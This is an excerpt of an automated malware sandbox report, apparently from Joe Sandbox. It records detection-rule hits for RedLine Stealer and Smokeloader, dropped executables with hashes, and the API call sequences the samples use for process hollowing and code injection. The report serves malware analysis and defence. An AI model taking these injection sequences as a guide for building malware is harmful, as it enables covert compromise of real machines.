                  Source: 29.0.BB62.exe.b80000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                  Source: 00000001.00000002.1549966457.0000000000529000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000018.00000002.1889731561.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000027.00000002.2031095427.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000027.00000002.2031606474.0000000002DCA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000021.00000002.2034312044.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000006.00000002.1794086138.0000000000729000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000001.00000002.1549853433.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000006.00000002.1793860457.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000021.00000002.2033637211.0000000002A00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000007.00000002.1767566996.000000000233D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeMemory allocated: 71495000 page read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeMemory allocated: 71616000 page read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeMemory allocated: 717F8000 page read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeMemory allocated: 7198F000 page read and writeJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_00401553
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_00401561
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_0040156B
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_0040156F
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_00401729
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00403335 RtlInitUnicodeString,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,towlower,1_2_00403335
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004023E5 NtQuerySystemInformation,1_2_004023E5
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_00401583
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_00401587
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004026A0 NtEnumerateKey,1_2_004026A0
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401553
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401561
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156B
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156F
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401729
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00403335 RtlInitUnicodeString,NtEnumerateKey,6_2_00403335
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_004023E5 NtQuerySystemInformation,6_2_004023E5
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401583
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401587
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_004026A0 NtEnumerateKey,6_2_004026A0
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_02500110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,7_2_02500110
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,10_2_00409543
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_0040E48D NtQuerySystemInformation,10_2_0040E48D
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_00401B2C NtQueryInformationProcess,10_2_00401B2C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051AC7A0 NtCreateThreadEx,15_2_051AC7A0
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,16_2_00409543
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_00401B2C NtQueryInformationProcess,16_2_00401B2C
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,16_2_004023F2
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_0040E48D NtQuerySystemInformation,16_2_0040E48D
                  Source: C:\ProgramData\Drivers\csrss.exeCode function: 24_2_02A00110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,24_2_02A00110
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_0040B453: DeviceIoControl,10_2_0040B453
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,16_2_004023F2
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004216551_2_00421655
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0041C2231_2_0041C223
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0041CE301_2_0041CE30
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0041BCD21_2_0041BCD2
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004196DE1_2_004196DE
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004228941_2_00422894
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0041C8B61_2_0041C8B6
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0041CB311_2_0041CB31
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004211C01_2_004211C0
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00421DC51_2_00421DC5
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004219F31_2_004219F3
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0041B7831_2_0041B783
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004221AD1_2_004221AD
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_004216556_2_00421655
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0041C2236_2_0041C223
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0041CE306_2_0041CE30
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0041BCD26_2_0041BCD2
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_004196DE6_2_004196DE
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_004228946_2_00422894
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0041C8B66_2_0041C8B6
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0041CB316_2_0041CB31
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_004211C06_2_004211C0
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00421DC56_2_00421DC5
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_004219F36_2_004219F3
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0041B7836_2_0041B783
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_004221AD6_2_004221AD
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_0040FC557_2_0040FC55
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_004074BE7_2_004074BE
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005D011C7_2_005D011C
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CE10E7_2_005CE10E
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CF5387_2_005CF538
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005D0E3E7_2_005D0E3E
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005D06967_2_005D0696
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CFA897_2_005CFA89
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_0040F7C07_2_0040F7C0
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_004103C57_2_004103C5
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_0040FFF37_2_0040FFF3
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CEFE97_2_005CEFE9
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005D03977_2_005D0397
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_004107AD7_2_004107AD
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005D27A17_2_005D27A1
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05074F5415_2_05074F54
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05074B0C15_2_05074B0C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05071ED415_2_05071ED4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05072C5815_2_05072C58
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_050720A415_2_050720A4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_0507313C15_2_0507313C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05072D7815_2_05072D78
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051ABD5015_2_051ABD50
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A144315_2_051A1443
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A164015_2_051A1640
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051AB88215_2_051AB882
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051ABB8215_2_051ABB82
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A858015_2_051A8580
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051AC7A015_2_051AC7A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051AC5F415_2_051AC5F4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051ACF1015_2_051ACF10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A912015_2_051A9120
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A829015_2_051A8290
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A8DB015_2_051A8DB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051ABFE015_2_051ABFE0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A10E015_2_051A10E0
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Drivers\csrss.exe A1480E23BD2A89B188FB01138EF2F54130F2DC41CE85FF9319AB7F15471B0011
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe 5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: String function: 00401DE0 appears 32 times
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248
                  Source: A6A0.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: A6A0.tmp.17.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: A6A0.tmp.17.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: A6A0.tmp.17.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: A6A0.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: A6A0.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: A6A0.tmp.20.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: is-88CHK.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-88CHK.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-88CHK.tmp.21.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: is-MN9TN.tmp.21.drStatic PE information: Number of sections : 11 > 10
                  Source: is-AQ01D.tmp.21.drStatic PE information: Number of sections : 11 > 10
                  Source: BroomSetup.exe.34.drStatic PE information: Number of sections : 11 > 10
                  Source: is-NDO9R.tmp.21.drStatic PE information: Number of sections : 11 > 10
                  Source: is-RGLU2.tmp.21.drStatic PE information: Number of sections : 11 > 10
                  Source: is-7865G.tmp.21.drStatic PE information: Number of sections : 11 > 10
                  Source: is-37AOI.tmp.21.drStatic PE information: Number of sections : 11 > 10
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: csunsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: swift.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: nfhwcrhk.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: surewarehook.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: csunsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: aep.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: atasi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: swift.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: nfhwcrhk.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: nuronssl.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: surewarehook.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: ubsec.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: aep.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: atasi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: swift.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: nfhwcrhk.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: nuronssl.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: surewarehook.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: ubsec.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: comsvcs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: cmlua.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: cmutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mscms.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: clusapi.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dll
